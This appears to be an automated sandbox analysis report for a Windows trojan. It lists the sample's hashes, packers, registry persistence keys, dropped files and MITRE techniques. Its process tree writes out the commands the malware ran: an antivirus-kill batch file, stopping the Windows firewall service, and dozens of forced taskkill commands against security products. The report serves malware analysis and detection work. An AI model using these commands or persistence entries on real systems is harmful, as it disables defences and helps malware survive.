3ca2e31aeba7bdb779ca62f879502752b0e10046ef021b3fc8f4694e01ebacba

Analysis

max time kernel
149s
max time network
123s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
09/01/2024, 15:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4eacc64af74d763c8c92fc186adbd787.exe
Size

1.7MB
MD5

4eacc64af74d763c8c92fc186adbd787
SHA1

cb219eb356152db3b43422d957cb099c2afe6fbf
SHA256

3ca2e31aeba7bdb779ca62f879502752b0e10046ef021b3fc8f4694e01ebacba
SHA512

51d83c3291cca99a3a58e3ecc19920d8dcd4b8599488ae051e8cb939621b129eb9de723dfc923c5ccfadc575cb1b3797c81bbd0c9fba6b7fb6f12968bdefa6db
SSDEEP

49152:iST/ajtxLsmifr7B5ZbV4d4Dm761UZp8lBW:Q8ZBUGmgUX8i

Score

10^/10

evasion persistence themida trojan upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe C:\\Windows\\system32\\fservice.exe"	taskkill.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe C:\\Windows\\system32\\fservice.exe"	services.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	reg.exe

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	services.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\DirectX For Microsoft® Windows = "C:\\Windows\\system32\\fservice.exe"	services.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	taskkill.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\DirectX For Microsoft® Windows = "C:\\Windows\\system32\\fservice.exe"	taskkill.exe

Modifies Installed Components in the registry 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}	taskkill.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\	taskkill.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\StubPath = "C:\\Windows\\system\\sservice.exe"	taskkill.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\	services.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\StubPath = "C:\\Windows\\system\\sservice.exe"	services.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2836	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2260	attrib.exe
2536	attrib.exe

Executes dropped EXE 4 IoCs

pid	Process
2660	aklremover.exe
2792	taskkill.exe
2632	taskkill.exe
2948	services.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	4eacc64af74d763c8c92fc186adbd787.exe

Loads dropped DLL 13 IoCs

pid	Process
2784	taskkill.exe
2784	taskkill.exe
2784	taskkill.exe
2784	taskkill.exe
2792	taskkill.exe
2792	taskkill.exe
2948	services.exe
2948	services.exe
2632	taskkill.exe
2792	taskkill.exe
2836	netsh.exe
2864	cmd.exe
2660	aklremover.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2784-0-0x0000000000400000-0x00000000006A4000-memory.dmp	themida
behavioral1/memory/2784-5-0x0000000000400000-0x00000000006A4000-memory.dmp	themida
behavioral1/memory/2792-60-0x0000000003270000-0x000000000346F000-memory.dmp	themida
behavioral1/memory/2784-40-0x0000000000400000-0x00000000006A4000-memory.dmp	themida

UPX packed file 21 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a0000000143ec-38.dat	upx
behavioral1/memory/2632-66-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2792-89-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-109-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2632-84-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/files/0x00090000000146b8-77.dat	upx
behavioral1/memory/2948-72-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2792-41-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-130-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-132-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-133-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-134-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-135-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-136-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-137-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-138-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-139-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-140-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-141-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-142-0x0000000000400000-0x00000000005FF000-memory.dmp	upx
behavioral1/memory/2948-143-0x0000000000400000-0x00000000005FF000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kill = "c:\\windows\\server.exe"	taskkill.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\	services.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\fservice.exe	taskkill.exe
File opened for modification	C:\Windows\SysWOW64\fservice.exe	taskkill.exe
File created	C:\Windows\SysWOW64\fservice.exe	taskkill.exe
File opened for modification	C:\Windows\SysWOW64\fservice.exe	taskkill.exe
File created	C:\Windows\SysWOW64\winkey.dll	services.exe
File created	C:\Windows\SysWOW64\reginv.dll	services.exe
File created	C:\Windows\SysWOW64\fservice.exe	services.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system\sservice.exe	taskkill.exe
File opened for modification	C:\Windows\system\sservice.exe	taskkill.exe
File created	C:\Windows\services.exe	taskkill.exe
File opened for modification	C:\Windows\services.exe	taskkill.exe
File created	C:\Windows\system\sservice.exe	taskkill.exe
File opened for modification	C:\Windows\system\sservice.exe	taskkill.exe
File created	C:\Windows\system\sservice.exe	services.exe
File opened for modification	C:\Windows\system\sservice.exe	services.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 64 IoCs

evasion

pid	Process
2316	taskkill.exe
2652	taskkill.exe
2372	taskkill.exe
2604	taskkill.exe
2064	taskkill.exe
2684	taskkill.exe
2588	taskkill.exe
1956	taskkill.exe
2856	taskkill.exe
1848	taskkill.exe
2340	taskkill.exe
2684	taskkill.exe
788	taskkill.exe
1940	taskkill.exe
2616	taskkill.exe
2152	taskkill.exe
784	taskkill.exe
972	taskkill.exe
2844	taskkill.exe
384	taskkill.exe
2924	taskkill.exe
2956	taskkill.exe
2988	taskkill.exe
2196	taskkill.exe
2816	taskkill.exe
2076	taskkill.exe
1560	taskkill.exe
2472	taskkill.exe
2448	taskkill.exe
2692	taskkill.exe
472	taskkill.exe
1884	taskkill.exe
1464	taskkill.exe
1172	taskkill.exe
3032	taskkill.exe
2384	taskkill.exe
2960	taskkill.exe
1272	taskkill.exe
1256	taskkill.exe
1464	taskkill.exe
2312	taskkill.exe
2168	taskkill.exe
1592	taskkill.exe
2000	taskkill.exe
572	taskkill.exe
2940	taskkill.exe
2928	taskkill.exe
2992	taskkill.exe
2980	taskkill.exe
936	taskkill.exe
788	taskkill.exe
1800	taskkill.exe
2816	taskkill.exe
1772	taskkill.exe
1192	taskkill.exe
480	taskkill.exe
968	taskkill.exe
2156	taskkill.exe
2208	taskkill.exe
2648	taskkill.exe
2572	taskkill.exe
2832	taskkill.exe
2848	taskkill.exe
2980	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2748	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2784	4eacc64af74d763c8c92fc186adbd787.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe
2948	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	2852	taskkill.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	568	taskkill.exe
Token: SeDebugPrivilege	788	taskkill.exe
Token: SeDebugPrivilege	384	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1864	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	900	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	2544	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	2244	taskkill.exe
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeDebugPrivilege	2844	taskkill.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	2992	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	936	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	800	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	2816	taskkill.exe
Token: SeDebugPrivilege	3060	net1.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	2512	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	2852	taskkill.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	568	taskkill.exe
Token: SeDebugPrivilege	788	taskkill.exe
Token: SeDebugPrivilege	384	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	2304	taskkill.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2784	4eacc64af74d763c8c92fc186adbd787.exe
2948	services.exe
2948	services.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2784 wrote to memory of 2660	2784	taskkill.exe	28
PID 2784 wrote to memory of 2660	2784	taskkill.exe	28
PID 2784 wrote to memory of 2660	2784	taskkill.exe	28
PID 2784 wrote to memory of 2660	2784	taskkill.exe	28
PID 2784 wrote to memory of 2864	2784	taskkill.exe	29
PID 2784 wrote to memory of 2864	2784	taskkill.exe	29
PID 2784 wrote to memory of 2864	2784	taskkill.exe	29
PID 2784 wrote to memory of 2864	2784	taskkill.exe	29
PID 2784 wrote to memory of 2792	2784	taskkill.exe	140
PID 2784 wrote to memory of 2792	2784	taskkill.exe	140
PID 2784 wrote to memory of 2792	2784	taskkill.exe	140
PID 2784 wrote to memory of 2792	2784	taskkill.exe	140
PID 2792 wrote to memory of 2632	2792	taskkill.exe	200
PID 2792 wrote to memory of 2632	2792	taskkill.exe	200
PID 2792 wrote to memory of 2632	2792	taskkill.exe	200
PID 2792 wrote to memory of 2632	2792	taskkill.exe	200
PID 2864 wrote to memory of 2536	2864	cmd.exe	572
PID 2864 wrote to memory of 2536	2864	cmd.exe	572
PID 2864 wrote to memory of 2536	2864	cmd.exe	572
PID 2864 wrote to memory of 2536	2864	cmd.exe	572
PID 2864 wrote to memory of 2836	2864	cmd.exe	571
PID 2864 wrote to memory of 2836	2864	cmd.exe	571
PID 2864 wrote to memory of 2836	2864	cmd.exe	571
PID 2864 wrote to memory of 2836	2864	cmd.exe	571
PID 2632 wrote to memory of 2948	2632	taskkill.exe	570
PID 2632 wrote to memory of 2948	2632	taskkill.exe	570
PID 2632 wrote to memory of 2948	2632	taskkill.exe	570
PID 2632 wrote to memory of 2948	2632	taskkill.exe	570
PID 2948 wrote to memory of 2528	2948	services.exe	569
PID 2948 wrote to memory of 2528	2948	services.exe	569
PID 2948 wrote to memory of 2528	2948	services.exe	569
PID 2948 wrote to memory of 2528	2948	services.exe	569
PID 2948 wrote to memory of 2720	2948	services.exe	35
PID 2948 wrote to memory of 2720	2948	services.exe	35
PID 2948 wrote to memory of 2720	2948	services.exe	35
PID 2948 wrote to memory of 2720	2948	services.exe	35
PID 2792 wrote to memory of 2692	2792	taskkill.exe	568
PID 2792 wrote to memory of 2692	2792	taskkill.exe	568
PID 2792 wrote to memory of 2692	2792	taskkill.exe	568
PID 2792 wrote to memory of 2692	2792	taskkill.exe	568
PID 2528 wrote to memory of 2008	2528	NET.exe	567
PID 2528 wrote to memory of 2008	2528	NET.exe	567
PID 2528 wrote to memory of 2008	2528	NET.exe	567
PID 2528 wrote to memory of 2008	2528	NET.exe	567
PID 2720 wrote to memory of 940	2720	NET.exe	566
PID 2720 wrote to memory of 940	2720	NET.exe	566
PID 2720 wrote to memory of 940	2720	NET.exe	566
PID 2720 wrote to memory of 940	2720	NET.exe	566
PID 2864 wrote to memory of 1848	2864	cmd.exe	201
PID 2864 wrote to memory of 1848	2864	cmd.exe	201
PID 2864 wrote to memory of 1848	2864	cmd.exe	201
PID 2864 wrote to memory of 1848	2864	cmd.exe	201
PID 1848 wrote to memory of 3060	1848	taskkill.exe	565
PID 1848 wrote to memory of 3060	1848	taskkill.exe	565
PID 1848 wrote to memory of 3060	1848	taskkill.exe	565
PID 1848 wrote to memory of 3060	1848	taskkill.exe	565
PID 2864 wrote to memory of 2680	2864	cmd.exe	564
PID 2864 wrote to memory of 2680	2864	cmd.exe	564
PID 2864 wrote to memory of 2680	2864	cmd.exe	564
PID 2864 wrote to memory of 2680	2864	cmd.exe	564
PID 2864 wrote to memory of 2960	2864	cmd.exe	563
PID 2864 wrote to memory of 2960	2864	cmd.exe	563
PID 2864 wrote to memory of 2960	2864	cmd.exe	563
PID 2864 wrote to memory of 2960	2864	cmd.exe	563

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2260	attrib.exe
2536	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4eacc64af74d763c8c92fc186adbd787.exe
"C:\Users\Admin\AppData\Local\Temp\4eacc64af74d763c8c92fc186adbd787.exe"
1⤵
- Identifies Wine through registry keys
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2784
- C:\Users\Admin\AppData\Local\Temp\aklremover.exe
  "C:\Users\Admin\AppData\Local\Temp\aklremover.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\av kill.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nod32krn.exe
    3⤵
    - Kills process with taskkill
    PID:2980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nod32.exe
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgemc.exe
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgamsvr.exe
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgw.exe
    3⤵
    PID:636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashwebsv.exe
    3⤵
    PID:568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashdisp.exe
    3⤵
    PID:788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashwebsv.exe
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im guard.exe
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im msmpeng.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mghml.exe
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im msiexec.exe
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im isafe.exe
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im minilog.exe
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im zlclient.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccapp.exe
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norton.exe
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navapsvc.exe
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cccproxy.exe
    3⤵
    - Kills process with taskkill
    PID:2924
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccevtmgr.exe
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im logexprt.exe
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nisum.exe
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im issvc.exe
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cpdclnt.exe
    3⤵
    - Kills process with taskkill
    PID:936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pavprot.exe
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im apvxdwin.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avguard.exe
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im shed.exe
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sccomm.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2412
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sgmain.exe
    3⤵
    PID:1824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im kpf4gui.exe
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcdash.exe
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcinfo.exe
    3⤵
    PID:788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im oasclnt.exe
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mpfconsole.exe
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mpftray.exe
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mvtx.exe
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im _avpcc.exe
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ackwin32.exe
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im agentsvr.exe
    3⤵
    PID:884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ahnsd.exe
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im amon.exe
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im antivirus.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2924
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im antssircam.exe
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im aplica32.exe
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im atcon.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ats.exe
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im atupdater.exe
    3⤵
    PID:940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im atwatch.exe
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im autodown.exe
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im autoupdate.exe
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ave32.exe
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgctrl.exe
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgserv.exe
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgserv9schedapp.exe
    3⤵
    PID:692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avkpop.exe
    3⤵
    PID:576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avkservice.exe
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avkwctl9.exe
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avp.exe
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avp32.exe
    3⤵
    PID:840
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpccavpm.exe
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpdos32.exe
    3⤵
    PID:472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpinst.exe
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avpmonitor.exe
    3⤵
    - Kills process with taskkill
    PID:1772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avptc32.exe
    3⤵
    - Kills process with taskkill
    PID:2152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avrescue.exe
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avsynmgr.exe
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avwinnt.exe
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avwupd32.exe
    3⤵
    - Kills process with taskkill
    PID:2648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxinit.exe
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxmonitor9x.exe
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxquar.exe
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avxw.exe
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im BACKLOG.exe
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bd_professional.exe
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bidserver.exe
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bisp.exe
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im blackd.exe
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im blackiceblackd.exe
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im BootWarn.exe
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bs120.exe
    3⤵
    PID:480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bullguard.exe
    3⤵
    PID:752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccevtmgr.exe
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccPwdSrc.exe
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccSetMgr.exe
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cdp.exe
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cfiadmin.exe
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cfinet.exe
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im claw95.exe
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im clean.exe
    3⤵
    PID:1960
